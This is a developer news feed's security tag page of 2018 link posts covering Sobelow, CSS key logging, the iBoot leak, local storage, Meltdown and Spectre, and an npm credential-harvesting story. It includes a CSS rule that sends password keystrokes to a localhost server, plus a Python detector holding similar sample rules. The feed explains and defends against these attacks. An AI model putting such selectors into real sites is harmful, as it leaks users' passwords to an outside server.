InfoSec, DevSec, Penetration Testing, etc.
Griffin Byatt

Sobelow – a security-focused static analyzer for the Phoenix framework

Yesterday, Griffin Byatt hit me up in Slack and let me know we had a few security holes. 😱 After a quick discussion about the magnitude of said holes, he informed me that he'd found them by running our code through his static analysis tool, Sobelow. Say what? For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent the introduction of a number of common vulnerabilities. I asked Griffin if he'd be kind enough to open a PR with the fixes so we can link it up and use it to show folks how handy this tool is. So that's what he did and that's what I'm doing! 💚

logged by @jerodsanto 2018-03-20T14:48:00.012895Z #phoenix #security


Third party CSS is not safe

Jake Archibald goes much deeper on our previous report of CSS key logging. Some folks called for browsers to 'fix' it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is 'safe'. Jake shared many examples as well as ways to mitigate these types of attacks.

logged by @adamstac 2018-02-27T22:25:54.376661Z #security #css


CSS key logging is a thing?! 😱

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here's how it works: Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image. Add some CSS that looks like this:

input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }

When the user types an a into the password field, it will hit your server for logging. Dastardly!

logged by @jerodsanto 2018-02-23T14:09:00.007925Z #security #css
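As an added example (not code from the post, from React, or from Jake's write-up), here is a small Python check a maintainer can run over a bundled stylesheet to flag rules that key a url() fetch on an input's value attribute. The stylesheet is constructed for the example, and the check is slightly more general than the snippet above: it also catches the ^=, *= and plain = variants, and reports same-origin URLs too, since those still land in a server log.

```python
import re

# Constructed sample stylesheet for this example; the two exfiltration rules
# mirror the shape of the selector quoted in the post (localhost, not a real host).
SAMPLE_CSS = """
/* harmless base styling */
input[type="password"] { border: 1px solid #ccc; }
/* value-dependent rules that fetch a different URL per typed character */
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }
input[type="password"][value$="b"] { background-image: url(http://localhost:3000/b); }
.hero, input.search { background-image: url("/img/hero.png"); }
"""

COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# One CSS rule: a selector list followed by a declaration block (no nesting handled).
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
# An <input> selector that also matches on its value attribute (=, ^=, $=, *=, ~=, |=).
VALUE_SELECTOR_RE = re.compile(r"input\b[^{,]*\[\s*value\s*[\^$*~|]?=", re.I)
URL_RE = re.compile(r"""url\(\s*["']?([^"')\s]+)""", re.I)


def find_value_exfil_rules(css: str):
    """Return (selector, url) pairs for rules that make a resource fetch depend on
    an input's value attribute. Any such rule leaks keystrokes to the URL's host."""
    findings = []
    for match in RULE_RE.finditer(COMMENT_RE.sub("", css)):
        selector, body = match.group(1).strip(), match.group(2)
        if not VALUE_SELECTOR_RE.search(selector):
            continue
        for url in URL_RE.findall(body):
            findings.append((selector, url))
    return findings


if __name__ == "__main__":
    for selector, url in find_value_exfil_rules(SAMPLE_CSS):
        print(f"value-keyed fetch: {selector} -> {url}")
```

Running this over the sample reports the two localhost rules and ignores the plain password styling and the hero image.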


Someone published the source code to iBoot (a critical piece of iOS) on GitHub

This is being called "the biggest leak in history", which is probably not true (remember when Gizmodo got its grubby paws on the iPhone 4?). But it's likely the biggest leak in Apple software history. Motherboard says it... could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. That's plausible. iBoot is responsible for ensuring a trusted boot of the O/S. The specific version posted was from iOS 9, but this portion of code probably doesn't get updated as often as the Music app, so it's likely still relevant. Apple promptly posted a DMCA takedown request, and the source code is no longer publicly available. But we developers know all too well that once source code is made public, there's no taking it private again.

logged by @jerodsanto 2018-02-08T14:39:54.81557Z #ios #security


Please stop using Local Storage

Randall Degges examines the good and bad uses of Local Storage. tldr, don't use it to store sensitive data. Almost every day I stumble across a new website storing sensitive user information in local storage and it bothers me to know that so many developers are opening themselves up to catastrophic security issues by doing so. Let’s have a heart-to-heart and talk about local storage and why you should stop using it to store session data.

logged by @adamstac 2018-01-28T05:56:15.515292Z #security #database

Medium

Meltdown and Spectre Explained

If some or most of what you've heard or read about Meltdown and Spectre has gone over your head, then you should 💯 read this technical explainer from Matt Klein (also known for being the creator of Envoy). Matt: I have not seen a good mid-level introduction to the vulnerabilities and mitigations. In this post I’m going to attempt to correct that by providing a gentle introduction to the hardware and software background required to understand the vulnerabilities, a discussion of the vulnerabilities themselves, as well as a discussion of the current mitigations. Matt goes on to share graphic charts of CPUs, virtual memory, and code samples to break down the exploit.

logged by @adamstac 2018-01-18T22:28:24.667005Z #security


Meltdown and Spectre

Everything you need to know about the Meltdown and Spectre bug. Q: Am I affected by the bug? A: Most certainly, yes. Q: Can I detect if someone has exploited Meltdown or Spectre against me? A: Probably not. The exploitation does not leave any traces in traditional log files. Q: Which systems are affected by Meltdown? A: Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995. Uh oh. 😱

logged by @adamstac 2018-01-07T04:59:44.381717Z #security

Hackernoon

I'm harvesting credit card numbers and passwords from your site. Here's how.

This is pretty scary regardless if it's based on a true story or not. When I first wrote this code back in 2015, it was of no use at all sitting on my computer. I needed to get it out into the world. Out into your site. Lucky for me, we live in an age where people install npm packages like they’re popping pain killers. So, npm was to be my distribution method. I would need to come up with some borderline-useful package that people would install without thinking — my Trojan horse. Oh and then there was this — this is an excellent opportunity for taking over npm packages and injecting malware by malicious people.

logged by @adamstac 2018-01-07T04:54:29.129835Z #security


A project after my own heart: 🗝 Add authentication to your Rails app without all the icky-ness of passwords We've been password-free on for a while now. It's not without drawbacks, but you can definitely sleep better knowing that even a database breach can't compromise your users' passwords. Because there aren't any.

logged by @jerodsanto 2017-12-12T17:59:00.010714Z #rails #security